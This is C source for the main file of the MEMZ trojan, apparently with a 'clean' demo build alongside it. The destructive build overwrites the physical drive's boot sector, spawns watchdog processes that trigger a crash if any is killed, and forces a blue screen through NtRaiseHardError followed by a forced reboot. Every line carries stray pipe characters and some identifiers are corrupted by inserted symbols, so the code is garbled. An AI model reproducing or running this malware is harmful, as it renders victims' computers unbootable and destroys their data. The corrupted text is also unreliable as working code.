#include "memz.h" |
int scrw, scrh; |
#ifdef CLEAN |
HWND mainWindow; // In the main window, in the main window, in the main window, ... |
HFONT font; |
HWND dialog; |
#endif |
void main() { |
scrw = GetSystemMetrics(SM_CXSCREEN); |
scrh = GetSystemMetrics(SM_CYSCREEN); |
#ifndef CLEAN |
int argc; |
LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc); |
if (argc > 1) { |
if (!lstrcmpW(argv[1], L "/watchdog" )) { |
CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL); |
WNDCLASSEXA c; |
c.cbSize = sizeof (WNDCLASSEXA); |
c.lpfnWndProc = WindowProc; |
c.lpszClassName = "hax" ; |
c.style = 0; |
c.cbClsExtra = 0; |
c.cbWndExtra = 0; |
c.hInstance = NULL; |
c.hIcon = 0; |
c.hCursor = 0; |
c.hbrBackground = 0; |
c.lpszMenuName = NULL; |
c.hIconSm = 0; |
RegisterClassExA(&c); |
HWND hwnd = CreateWindowExA(0, "hax" , NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL); |
MSG msg; |
while (GetMessage(&msg, NULL, 0, 0) > 0) { |
TranslateMessage(&msg); |
DispatchMessage(&msg); |
} |
} |
} else { |
// Another very ugly formatting |
if (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\ |
This malware will harm your computer and makes it unusable.\r\n\ |
If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\ |
If you know what this malware does and are using a safe environment to test, \ |
press Yes to start it.\r\n\r\n\ |
DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE? ", " MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES || |
MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\ |
THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n\ |
STILL EXECUTE IT? ", " MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) { |
ExitProcess(0); |
} |
wchar_t *fn = ( wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2); |
GetModuleFileName(NULL, fn, 8192); |
for ( int i = 0; i < 5; i++) |
ShellExecute(NULL, NULL, fn, L "/watchdog" , NULL, SW_SHOWDEFAULT); |
SHELLEXECUTEINFO info; |
info.cbSize = sizeof (SHELLEXECUTEINFO); |
info.lpFile = fn; |
info.lpParameters = L "/main" ; |
info.fMask = SEE_MASK_NOCLOSEPROCESS; |
info.hwnd = NULL; |
info.lpVerb = NULL; |
info.lpDirectory = NULL; |
info.hInstApp = NULL; |
info.nShow = SW_SHOWDEFAULT; |
ShellExecuteEx(&info); |
SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS); |
ExitProcess(0); |
} |
HANDLE drive = CreateFileA( "\\\\.\\PhysicalDrive0" , GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); |
if (drive == INVALID_HANDLE_VALUE) |
ExitProcess(2); |
unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536); |
// Join the two code parts together |
int i = 0; |
for (; i < code1_len; i++) |
*(bootcode + i) = *(code1 + i); |
for (i = 0; i < code2_len; i++) |
*(bootcode + i + 0x1fe) = *(code2 + i); |
DWORD wb; |
if (!WriteFile(drive, bootcode, 65536, &wb, NULL)) |
ExitProcess(3); |
CloseHandle(drive); |
HANDLE note = CreateFileA( "\\note.txt" , GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); |
if (note == INVALID_HANDLE_VALUE) |
ExitProcess(4); |
if (!WriteFile(note, msg, msg_len, &wb, NULL)) |
ExitProcess(5); |
CloseHandle(note); |
ShellExecuteA(NULL, NULL, "notepad" , "\\note.txt" , NULL, SW_SHOWDEFAULT); |
for ( int p = 0; p < nPayloads; p++) { |
Sleep(payloads[p].delay); |
CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL); |
} |
for (;;) { |
Sleep(10000); |
} |
#else // CLEAN |
InitCommonControls(); |
dialog = NULL; |
LOGFONT lf; |
GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof (LOGFONT), &lf); |
font = CreateFont(lf.lfHeight, lf.lfWidth, |
lf.lfEscapement, lf.lfOrientation, lf.lfWeight, |
lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet, |
lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality, |
lf.lfPitchAndFamily, lf.lfFaceName); |
WNDCLASSEX c; |
c.cbSize = sizeof (WNDCLASSEX); |
c.lpfnWndProc = WindowProc; |
c.lpszClassName = L "MEMZPanel" ; |
c.style = CS_HREDRAW | CS_VREDRAW; |
c.cbClsExtra = 0; |
c.cbWndExtra = 0; |
c.hInstance = NULL; |
c.hIcon = 0; |
c.hCursor = 0; |
c.hbrBackground = ( HBRUSH )(COLOR_3DFACE+1); |
c.lpszMenuName = NULL; |
c.hIconSm = 0; |
RegisterClassEx(&c); |
RECT rect; |
rect.left = 0; |
rect.right = WINDOWWIDTH; |
rect.top = 0; |
rect.bottom = WINDOWHEIGHT; |
AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE); |
mainWindow = CreateWindowEx(0, L "MEMZPanel" , L "MEMZ Clean Version - Payload Panel" , WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, |
50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL); |
for ( int p = 0; p < nPayloads; p++) { |
payloads[p].btn = CreateWindowW(L "BUTTON" , payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY, |
(p%COLUMNS)*喵NWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*喵NHEIGHT + SPACE*(p/COLUMNS+1), 喵NWIDTH, 喵NHEIGHT, |
mainWindow, NULL, ( HINSTANCE )GetWindowLong(mainWindow, GWL_HINSTANCE), NULL); |
SendMessage(payloads[p].btn, WM_SETFONT, ( WPARAM )font, TRUE); |
CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL); |
} |
SendMessage(mainWindow, WM_SETFONT, ( WPARAM )font, TRUE); |
ShowWindow(mainWindow, SW_SHOW); |
UpdateWindow(mainWindow); |
|
CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL); |
MSG msg; |
while (GetMessage(&msg, NULL, 0, 0) > 0) { |
if (dialog == NULL || !IsDialogMessage(dialog, &msg)) { |
TranslateMessage(&msg); |
DispatchMessage(&msg); |
} |
} |
#endif |
} |
#ifndef CLEAN |
LRESULT CALLBACK WindowProc( HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { |
if (msg == WM_CLOSE || msg == WM_ENDSESSION) { |
killWindows(); |
return 0; |
} |
return DefWindowProc(hwnd, msg, wParam, lParam); |
} |
DWORD WINAPI watchdogThread( LPVOID parameter) { |
int oproc = 0; |
char *fn = ( char *)LocalAlloc(LMEM_ZEROINIT, 512); |
GetProcessImageFileNameA(GetCurrentProcess(), fn, 512); |
Sleep(1000); |
for (;;) { |
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); |
PROCESSENTRY32 proc; |
proc.dwSize = sizeof (proc); |
Process32First(snapshot, &proc); |
int nproc = 0; |
do { |
HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID); |
char *fn2 = ( char *)LocalAlloc(LMEM_ZEROINIT, 512); |
GetProcessImageFileNameA(hProc, fn2, 512); |
if (!lstrcmpA(fn, fn2)) { |
nproc++; |
} |
CloseHandle(hProc); |
LocalFree(fn2); |
} while (Process32Next(snapshot, &proc)); |
CloseHandle(snapshot); |
if (nproc < oproc) { |
killWindows(); |
} |
oproc = nproc; |
Sleep(10); |
} |
} |
void killWindows() { |
// Show cool MessageBoxes |
for ( int i = 0; i < 20; i++) { |
CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL); |
Sleep(100); |
} |
killWindowsInstant(); |
} |
void killWindowsInstant() { |
// Try to force BSOD first |
// I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)... |
// This isn't even an exploit, it's just an undocumented feature. |
HMODULE ntdll = LoadLibraryA( "ntdll" ); |
FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege" ); |
FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError" ); |
if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) { |
BOOLEAN tmp1; DWORD tmp2; |
(( void (*)( DWORD , DWORD , BOOLEAN , LPBYTE ))RtlAdjustPrivilege)(19, 1, 0, &tmp1); |
(( void (*)( DWORD , DWORD , DWORD , DWORD , DWORD , LPDWORD ))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2); |
} |
// If the computer is still running, do it the normal way |
HANDLE token; |
TOKEN_PRIVILEGES privileges; |
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token); |
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid); |
privileges.PrivilegeCount = 1; |
privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; |
AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0); |
// The actual restart |
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK); |
} |
DWORD WINAPI ripMessageThread( LPVOID parameter) { |
HHOOK hook = SetWindowsHookEx(WH_C喵, msgBoxHook, 0, GetCurrentThreadId()); |
MessageBoxA(NULL, ( LPCSTR )msgs[random() % nMsgs], "MEMZ" , MB_OK | MB_SYSTEMMODAL | MB_ICONHAND); |
UnhookWindowsHookEx(hook); |
return 0; |
} |
#else // CLEAN |
LRESULT CALLBACK WindowProc( HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { |
PAINTSTRUCT ps; |
HDC hdc; |
|
if (msg == WM_ACTIVATE) { |
if (wParam == NULL) |
dialog = NULL; |
else |
dialog = hwnd; |
} else if (msg == WM_DESTROY) { |
ExitProcess(0); |
} else if (msg == WM_COMMAND) { |
if (wParam == BN_CLICKED && SendMessage(( HWND )lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) { |
for ( int p = 0; p < nPayloads; p++) { |
if (payloads[p].btn == ( HWND )lParam && !payloads[p].safe) { |
SendMessage(( HWND )lParam, BM_SETCHECK, BST_UNCHECKED, NULL); |
// Most ugly formatting EVER |
if (MessageBoxA(hwnd, |
"This payload is considered semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\ |
If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \ |
virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\ |
Do you still want to enable it?", |
"MEMZ" , MB_YESNO | MB_ICONWARNING) == IDYES) { |
SendMessage(( HWND )lParam, BM_SETCHECK, BST_CHECKED, NULL); |
} |
} |
} |
} |
} else if (msg == WM_PAINT) { |
hdc = BeginPaint(hwnd, &ps); |
SelectObject(hdc, font); |
LPWSTR str; |
LPWSTR state = enablePayloads ? L "ENABLED" : L "DISABLED" ; |
FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY, |
L "Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!" , 0, 0, ( LPWSTR )&str, 1024, ( va_list *)&state); |
TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str)); |
TextOut(hdc, 10, WINDOWHEIGHT - 20, L "Press CTRL+SHIFT+S to skip some time (makes some payloads faster)" , 65); |
EndPaint(hwnd, &ps); |
} else { |
return DefWindowProc(hwnd, msg, wParam, lParam); |
} |
return 0; |
} |
DWORD WINAPI keyboardThread( LPVOID lParam) { |
for (;;) { |
if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) { |
enablePayloads = !enablePayloads; |
if (!enablePayloads) { |
RECT rect; |
HWND desktop = GetDesktopWindow(); |
GetWindowRect(desktop, &rect); |
RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN); |
EnumWindows(&CleanWindowsProc, NULL); |
} else { |
RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE); |
} |
while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) { |
Sleep(100); |
} |
} else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState( 'S' )) & 0x8000) { |
if (enablePayloads) { |
for ( int p = 0; p < nPayloads; p++) { |
if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) { |
payloads[p].delay = payloads[p].payloadFunction(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE); |
} |
} |
} |
} |
Sleep(10); |
} |
return 0; |
} |
BOOL CALLBACK CleanWindowsProc( HWND hwnd, LPARAM lParam) { |
DWORD pid; |
if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) { |
SendMessage(hwnd, WM_CLOSE, 0, 0); |
} |
return TRUE; |
} |
#endif |